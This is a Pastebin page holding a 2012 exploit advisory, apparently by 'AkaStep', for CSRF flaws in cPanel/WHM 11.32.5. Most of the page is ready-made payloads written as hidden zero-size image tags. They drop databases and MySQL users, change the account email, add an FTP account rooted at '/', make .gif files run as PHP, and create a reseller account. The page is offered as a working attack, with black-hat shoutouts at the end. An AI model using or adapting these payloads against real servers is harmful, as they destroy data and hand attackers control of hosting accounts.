API tools faq
paste
Advertisement
Guest User

cPanel version : 11.32.5 0day

a guest
Oct 20th, 2012
1,329
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.14 KB | None | 0 0
raw download clone embed print report
  1. ==============================================================================
  2. Vulnerable Software: cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ]
  3. Vulnerability: CSRF
  4. Vendor: cpanel.net
  5. ==============================================================================
  6.  
  7. =====================================================================
  8. Tested version: Your current cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ]
  9.  
  10. Aka: Cpanel Accelerated 2
  11. via
  12. WHM 11.32.5 (build 11)
  13.  
  14. =====================================================================
  15.  
  16. CSRF: Drop Database: (Method $_GET)
  17.  
  18. <img src="http://***********.net:2082/frontend/x3/sql/deldb.html?db=armenian_music" heigth="0" width="0" />
  19.  
  20. Here we are going to drop database named: armenian_music
  21. =====================================================================
  22.  
  23. CSRF: Drop mysql user: (Method $_GET)
  24.  
  25.  
  26. <img src="http://************.net:2082/frontend/x3/sql/deluser.html?user=armenian_adserve" heigth="0" width="0" />
  27. Here we are going to drop mysql user named: armenian_adserver ))
  28.  
  29. =====================================================================
  30. CSRF: Change email address: (Contact Information & Preferences) (Method $_GET)
  31. Changing email address to: owned_and_owned_again@gmail.tld
  32.  
  33. <img src="http://***********.net:2082/frontend/x3/contact/saveemail.html?email=owned_and_owned_again%40gmail.tld&second_email=&notify_disk_limit=1&notify_bandwidth_limit=1&notify_email_quota_limit=1" heigth="0" width="0" />
  34.  
  35.  
  36. =====================================================================
  37.  
  38. CSRF adding FTP account:
  39.  
  40. username: akastep
  41. password: akastep
  42. host is target host.
  43.  
  44.  
  45. <img src="http://***********.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_jsonapi_func=addftp&user=akastep&pass=akastep&homedir=/&quota=0&cache_fix=owned_by_akastep" heigth="0" width="0" />
  46.  
  47. =====================================================================
  48.  
  49.  
  50. CSRF Drop FTP account:
  51.  
  52. Deletes existent ftp account named: axaxa
  53.  
  54.  
  55. <img src="http://************.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_jsonapi_func=delftp&user=axaxa&cache_fix=OWNED" heigth="0" width="0" />
  56.  
  57. =====================================================================
  58.  
  59.  
  60.  
  61. CSRF change Apache handler:
  62.  
  63. (Parse .gif file as php script)
  64.  
  65. <img src="http://***********.net:2082/frontend/x3/mime/addhandle.html?handle=application/x-httpd-php&ext=.gif&submit=Add" heigth="0" width="0" />
  66. =====================================================================
  67.  
  68.  
  69. CSRF Delete handler:
  70.  
  71.  
  72. <img src="http://***********.net:2082/frontend/x3/mime/delhandle.html?userhandle=.php" heigth="0" width="0" />
  73.  
  74.  
  75. =====================================================================
  76.  
  77. WHM 11.32.5 (build 11)
  78.  
  79.  
  80. CSRF: Add Reseller+setup
  81. with domain: owned.com
  82. username: owned111
  83. password: MYVERYSTRONGGOESHERE
  84. And contact email: owned@owned1.you
  85.  
  86. <img src="http://***********.net:2086/scripts5/wwwacct?sign=&plan=Reseller+setup&domain=owned.com&username=owned111&password=MYVERYSTRONGGOESHERE&contactemail=owned%40owned1.you&dbuser=owned&msel=n%2Cy%2C1%2Cn%2Cx3%2C1%2C1%2C1%2C1%2C1%2C1000%2Cn%2C0%2C0%2Cdefault%2Cen%2C%2C%2CReseller+setup&pkgname=&featurelist=default&quota=1&bwlimit=1000&maxftp=1&maxpop=1&maxlst=1&maxsql=1&maxsub=1&maxpark=0&maxaddon=0&cgi=1&cpmod=x3&language=en&hasuseregns=1&dkim=1&mxcheck=local" heigth="0" width="0" />
  87.  
  88.  
  89. =====================================================================
  90.  
  91.  
  92.  
  93.  
  94.  
  95. ================================================
  96.  
  97. SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
  98. ================================================
  99. packetstormsecurity.org
  100. packetstormsecurity.com
  101. packetstormsecurity.net
  102. securityfocus.com
  103. cxsecurity.com
  104. security.nnov.ru
  105. securtiyvulns.com
  106. securitylab.ru
  107. secunia.com
  108. securityhome.eu
  109. exploitsdownload.com
  110. exploit-db.com
  111. osvdb.com
  112. websecurity.com.ua
  113.  
  114. to all Aa Team + to all Azerbaijan Black HatZ +
  115. *Especially to my bro CAMOUFL4G3 *
  116. Also special thanks to: ottoman38 & HERO_AZE
  117. ================================================
  118.  
  119. /AkaStep
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!